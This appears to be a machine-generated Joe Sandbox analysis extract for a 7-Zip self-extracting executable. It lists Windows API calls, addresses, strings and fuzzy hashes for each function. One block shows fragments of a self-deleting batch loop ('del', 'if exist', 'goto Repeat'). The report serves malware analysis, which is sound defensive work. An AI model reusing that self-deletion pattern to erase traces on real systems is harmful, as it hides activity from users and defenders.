                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                                                                                                                • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$PasswordText$PasswordTitle$Progress$Title$WarningTitle
                                                                                                                                                                • API String ID: 2725485552-2157245290
                                                                                                                                                                • Opcode ID: d0ccb95079a2c606f9a3c0ce682cef1d136eaf38159f665c4b074d3e10087a1f
                                                                                                                                                                • Instruction ID: 66a2ce9ff7a2cb702224bd8f74ea761d5872454bbbc4643ec2785d60350ddd68
                                                                                                                                                                • Opcode Fuzzy Hash: d0ccb95079a2c606f9a3c0ce682cef1d136eaf38159f665c4b074d3e10087a1f
                                                                                                                                                                • Instruction Fuzzy Hash: AC51D8F1E016007ADA216B275D4ADAF366CEB85704B28443BFD04F22D6E77C4A4046EF
                                                                                                                                                                APIs
                                                                                                                                                                • GetDriveTypeW.KERNEL32(?,?,?), ref: 004057DA
                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040580B
                                                                                                                                                                • WriteFile.KERNEL32(0041EA30,?,?,00407468,00000000,del ",:Repeat,00000000), ref: 004058C0
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 004058CB
                                                                                                                                                                • CloseHandle.KERNEL32(0041EA30), ref: 004058D4
                                                                                                                                                                • SetFileAttributesW.KERNEL32(00407468,00000000), ref: 004058EB
                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 004058FD
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405906
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405912
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00407468,?), ref: 00405918
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00407468,?,?,?,?,?,?,?,?,?,?,?,?,?,00407468,0041EA30), ref: 00405946
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                                                                                                                • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                                                                                                                • API String ID: 3007203151-3467708659
                                                                                                                                                                • Opcode ID: 30920ae2f114942037667fcef3695092ebf7d87c0f31e60c9b52ff49f89ef857
                                                                                                                                                                • Instruction ID: eb7ea14b5f0693ba8c6a98bcb421c9bec9bd01f197c59b95adb21b6866ed8523
                                                                                                                                                                • Opcode Fuzzy Hash: 30920ae2f114942037667fcef3695092ebf7d87c0f31e60c9b52ff49f89ef857
                                                                                                                                                                • Instruction Fuzzy Hash: DE413871800108AEDB11ABA5EC86DEF7B7DEF04724F50843AF511721E1EB795E85CB98
                                                                                                                                                                APIs
                                                                                                                                                                • GetClassNameA.USER32(?,?,00000040), ref: 00403436
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,STATIC), ref: 00403449
                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00403456
                                                                                                                                                                  • Part of subcall function 004033E0: GetWindowTextLengthW.USER32(?), ref: 004033F1
                                                                                                                                                                  • Part of subcall function 004033E0: GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403483
                                                                                                                                                                • GetParent.USER32(?), ref: 00403491
                                                                                                                                                                • LoadLibraryA.KERNEL32(riched20), ref: 004034A5
                                                                                                                                                                • GetMenu.USER32(?), ref: 004034B8
                                                                                                                                                                • SetThreadLocale.KERNEL32(00000419), ref: 004034C5
                                                                                                                                                                • CreateWindowExW.USER32(00000000,RichEdit20W,0041A584,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004034F5
                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00403506
                                                                                                                                                                • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 0040351B
                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 0040351F
                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0040352D
                                                                                                                                                                • SendMessageW.USER32(00000000,00000461,?,?), ref: 00403558
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040355D
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403565
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                                                                                                                • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                                                                                                                • API String ID: 3514532227-2281146334
                                                                                                                                                                • Opcode ID: c286caa82b99ae390a7687983e8ee3eb06d76ab9f7170e9dcdb9ea0a05f1a152
                                                                                                                                                                • Instruction ID: e5fea360a7eb9894b086cd4675cd9c6500acd79176ce5b6afcc660833785d9d0
                                                                                                                                                                • Opcode Fuzzy Hash: c286caa82b99ae390a7687983e8ee3eb06d76ab9f7170e9dcdb9ea0a05f1a152
                                                                                                                                                                • Instruction Fuzzy Hash: 67317F72901109BFDB01AFA5DC49EEF7BBCEB08705F10407AF604F6190DA799E518B6A
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
                                                                                                                                                                • LoadIconW.USER32(00000000), ref: 00408EA2
                                                                                                                                                                • GetSystemMetrics.USER32(00000032), ref: 00408EB6
                                                                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 00408EBB
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
                                                                                                                                                                • LoadImageW.USER32(00000000), ref: 00408EC7
                                                                                                                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
                                                                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
                                                                                                                                                                • GetDlgItem.USER32(?,000004B2), ref: 00408F0C
                                                                                                                                                                • GetDlgItem.USER32(?,000004B2), ref: 00408F16
                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00408F22
                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
                                                                                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 00408F3F
                                                                                                                                                                • GetDlgItem.USER32(?,000004B5), ref: 00408F4D
                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00408F59
                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 0040904E
                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 0040906A
                                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00409082
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00409240), ref: 004090E2
                                                                                                                                                                • LoadIconW.USER32(00000000), ref: 004090E9
                                                                                                                                                                • GetDlgItem.USER32(?,000004B1), ref: 00409108
                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040910B
                                                                                                                                                                  • Part of subcall function 00408270: GetDlgItem.USER32(?,?), ref: 0040827A
                                                                                                                                                                  • Part of subcall function 00408270: GetWindowTextLengthW.USER32(00000000), ref: 00408281
                                                                                                                                                                  • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                                                                                                                  • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3694754696-0
                                                                                                                                                                • Opcode ID: e6b773451116d13ff29ab79287a6f607863c90a398c86fb93464d41f8a12962b
                                                                                                                                                                • Instruction ID: 99f397414dc97442f2ad5b2e660166812613d2f2543b201c56f9d92a48738ce2
                                                                                                                                                                • Opcode Fuzzy Hash: e6b773451116d13ff29ab79287a6f607863c90a398c86fb93464d41f8a12962b
                                                                                                                                                                • Instruction Fuzzy Hash: B971E6703047056BEA216B21DD4AF2B3659EF84714F10443EF652BA2E3CFBDAC018A5E
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowDC.USER32(00000000), ref: 004021B4
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 004021C0
                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004021D9
                                                                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00402208
                                                                                                                                                                • MulDiv.KERNEL32(?,00000003,00000002), ref: 00402213
                                                                                                                                                                • MulDiv.KERNEL32(?,00000003,00000002), ref: 0040221D
                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 0040222B
                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00402232
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00402240
                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040224E
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00402256
                                                                                                                                                                • SetStretchBltMode.GDI32(00000000,00000004), ref: 0040225E
                                                                                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040227D
                                                                                                                                                                • GetCurrentObject.GDI32(00000000,00000007), ref: 00402286
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00402293
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00402299
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 004022A2
                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 004022A5
                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 004022AC
                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 004022BB
                                                                                                                                                                • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 004022C8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3462224810-0
                                                                                                                                                                • Opcode ID: 3220a658d56a4ac9a5ca2fef4fc815231d73787dff14446d5a04d435e3e7e9ea
                                                                                                                                                                • Instruction ID: 3b0073103a1e3377af01ca77c53c0656b208625dbf3d379900f4631a354f9c66
                                                                                                                                                                • Opcode Fuzzy Hash: 3220a658d56a4ac9a5ca2fef4fc815231d73787dff14446d5a04d435e3e7e9ea
                                                                                                                                                                • Instruction Fuzzy Hash: DB314A76D01208BFDF115FE19D48EEF7F79EB48760F108066FA04B61A0C6794A60EB66
                                                                                                                                                                APIs
                                                                                                                                                                • GetClassNameA.USER32(?,?,00000040), ref: 004022E5
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,STATIC), ref: 004022FC
                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0040230F
                                                                                                                                                                • GetMenu.USER32(?), ref: 00402324
                                                                                                                                                                  • Part of subcall function 004020BF: GetModuleHandleW.KERNEL32(00000000), ref: 004020CA
                                                                                                                                                                  • Part of subcall function 004020BF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 004020E7
                                                                                                                                                                  • Part of subcall function 004020BF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 004020FB
                                                                                                                                                                  • Part of subcall function 004020BF: SizeofResource.KERNEL32(00000000,00000000), ref: 0040210C
                                                                                                                                                                  • Part of subcall function 004020BF: LoadResource.KERNEL32(00000000,00000000), ref: 00402116
                                                                                                                                                                  • Part of subcall function 004020BF: LockResource.KERNEL32(00000000), ref: 00402121
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402356
                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00402363
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 0040236C
                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402378
                                                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,0041C434,?), ref: 0040239D
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004023AD
                                                                                                                                                                  • Part of subcall function 004021A8: GetWindowDC.USER32(00000000), ref: 004021B4
                                                                                                                                                                  • Part of subcall function 004021A8: GetDeviceCaps.GDI32(00000000,00000058), ref: 004021C0
                                                                                                                                                                  • Part of subcall function 004021A8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 004021D9
                                                                                                                                                                  • Part of subcall function 004021A8: GetObjectW.GDI32(?,00000018,?), ref: 00402208
                                                                                                                                                                  • Part of subcall function 004021A8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00402213
                                                                                                                                                                  • Part of subcall function 004021A8: MulDiv.KERNEL32(?,00000003,00000002), ref: 0040221D
                                                                                                                                                                  • Part of subcall function 004021A8: CreateCompatibleDC.GDI32(?), ref: 0040222B
                                                                                                                                                                  • Part of subcall function 004021A8: CreateCompatibleDC.GDI32(?), ref: 00402232
                                                                                                                                                                  • Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402240
                                                                                                                                                                  • Part of subcall function 004021A8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040224E
                                                                                                                                                                  • Part of subcall function 004021A8: SelectObject.GDI32(00000000,00000000), ref: 00402256
                                                                                                                                                                  • Part of subcall function 004021A8: SetStretchBltMode.GDI32(00000000,00000004), ref: 0040225E
                                                                                                                                                                  • Part of subcall function 004021A8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0040227D
                                                                                                                                                                  • Part of subcall function 004021A8: GetCurrentObject.GDI32(00000000,00000007), ref: 00402286
                                                                                                                                                                  • Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402293
                                                                                                                                                                  • Part of subcall function 004021A8: SelectObject.GDI32(00000000,?), ref: 00402299
                                                                                                                                                                  • Part of subcall function 004021A8: DeleteDC.GDI32(00000000), ref: 004022A2
                                                                                                                                                                  • Part of subcall function 004021A8: DeleteDC.GDI32(00000000), ref: 004022A5
                                                                                                                                                                  • Part of subcall function 004021A8: ReleaseDC.USER32(00000000,?), ref: 004022AC
                                                                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 004023DF
                                                                                                                                                                • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004023F3
                                                                                                                                                                • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00402405
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040241A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                                                                                                                • String ID: IMAGES$STATIC
                                                                                                                                                                • API String ID: 4202116410-1168396491
                                                                                                                                                                • Opcode ID: 319126f5dc4d95ce062933b29b07fa50ef7377debf118cdda567db34e57cdb6f
                                                                                                                                                                • Instruction ID: 12319829fe5b29bb351e3d23e86017266b1b8e93f03e65421de7465a1357d20e
                                                                                                                                                                • Opcode Fuzzy Hash: 319126f5dc4d95ce062933b29b07fa50ef7377debf118cdda567db34e57cdb6f
                                                                                                                                                                • Instruction Fuzzy Hash: 54419A31901218BFCB129FA1CC4CDEEBFB9FF09715B008076F905A62A0D7798A51DB69
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,000004B3), ref: 00407A80
                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00407A85
                                                                                                                                                                • GetDlgItem.USER32(?,000004B4), ref: 00407ABC
                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00407AC1
                                                                                                                                                                • GetSystemMetrics.USER32(00000010), ref: 00407B43
                                                                                                                                                                • GetSystemMetrics.USER32(00000011), ref: 00407B49
                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00407B50
                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00407B57
                                                                                                                                                                • GetParent.USER32(?), ref: 00407B7B
                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00407B8D
                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 00407BA0
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 00407C06
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00407CA0
                                                                                                                                                                  • Part of subcall function 00407A29: GetDlgItem.USER32(?,?), ref: 00407A47
                                                                                                                                                                  • Part of subcall function 00407A29: SetWindowPos.USER32(00000000), ref: 00407A4E
                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 00407BA9
                                                                                                                                                                  • Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C
                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00407D25
                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00407D2C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 747815384-0
                                                                                                                                                                • Opcode ID: 5ad90722fe14a1231b09212549862ba01d9118f977830e8c8324fbeb544dab44
                                                                                                                                                                • Instruction ID: 68cc850d19f91a6f8b6e213b01393e3a0b6efc74fec8c50de4b66a5980513343
                                                                                                                                                                • Opcode Fuzzy Hash: 5ad90722fe14a1231b09212549862ba01d9118f977830e8c8324fbeb544dab44
                                                                                                                                                                • Instruction Fuzzy Hash: 30A13870E04209AFDB14DFBDCD85AAEBBF9EF48704F14452AE605F2281D678F9018B65
                                                                                                                                                                APIs
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,0041E3F0,00000000), ref: 0040377F
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,0041E3F0,00000000), ref: 00403787
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00404A6A,?), ref: 004039AD
                                                                                                                                                                  • Part of subcall function 00402990: ??3@YAXPAX@Z.MSVCRT(?,?,00405791,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 00402996
                                                                                                                                                                  • Part of subcall function 00402990: ??3@YAXPAX@Z.MSVCRT(?,?,?,00405791,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 0040299D
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00404A6A,?,?,00000000,00000000,0041E3F0,00000000), ref: 004039DA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                • String ID: SetEnvironment${\rtf
                                                                                                                                                                • API String ID: 613200358-318139784
                                                                                                                                                                • Opcode ID: 9c91db27a8941fd50da050c674d3134fcc22a39ccbb8c0b40c6bb86ab884216b
                                                                                                                                                                • Instruction ID: 401acfcb82d7e6738f93d8480f5cee0d093a2887585a601c22b507f4e5910529
                                                                                                                                                                • Opcode Fuzzy Hash: 9c91db27a8941fd50da050c674d3134fcc22a39ccbb8c0b40c6bb86ab884216b
                                                                                                                                                                • Instruction Fuzzy Hash: B991C372900108ABDF11AFD5D941AEEBBB8AF14309F2480BBE841772D2D7785B06DB59
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                                                                • String ID: pA
                                                                                                                                                                • API String ID: 801014965-794713698
                                                                                                                                                                • Opcode ID: cae9fb80b135284d651053ec5c4070e0fe44fc22ae79128d29673caf091d45a2
                                                                                                                                                                • Instruction ID: 5929b0b6314edc43fbf3f3d2a0fc95e577a76ca797df3ab901b2fe2a182a5e0d
                                                                                                                                                                • Opcode Fuzzy Hash: cae9fb80b135284d651053ec5c4070e0fe44fc22ae79128d29673caf091d45a2
                                                                                                                                                                • Instruction Fuzzy Hash: 1141ADB2D41344BFDB22CFA5DC55AEABBB9FB09710F20012BE841A3291D7785D81CB59
                                                                                                                                                                APIs
                                                                                                                                                                • GetParent.USER32(?), ref: 00407F94
                                                                                                                                                                • GetWindowLongW.USER32(00000000), ref: 00407F9B
                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00407FB1
                                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 00407FCE
                                                                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 00407FE0
                                                                                                                                                                • GetSystemMetrics.USER32(00000032), ref: 00407FE7
                                                                                                                                                                • GetWindowDC.USER32(?), ref: 00407FF9
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00408006
                                                                                                                                                                • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 0040803A
                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00408042
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.3383786075.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.3383500912.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3383929276.000000000041A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384040841.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_4802836d37.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2586545124-0
                                                                                                                                                                • Opcode ID: 02fb6cd533524937890b9fbe5e83660d242e66e068d65fd6c1c3ae9fb8eaf448
                                                                                                                                                                • Instruction ID: 8ffa6a621c4839b38abe7fa2179ce9be6ee40ef55f84cce8d9fec75f1bbbc175
                                                                                                                                                                • Opcode Fuzzy Hash: 02fb6cd533524937890b9fbe5e83660d242e66e068d65fd6c1c3ae9fb8eaf448
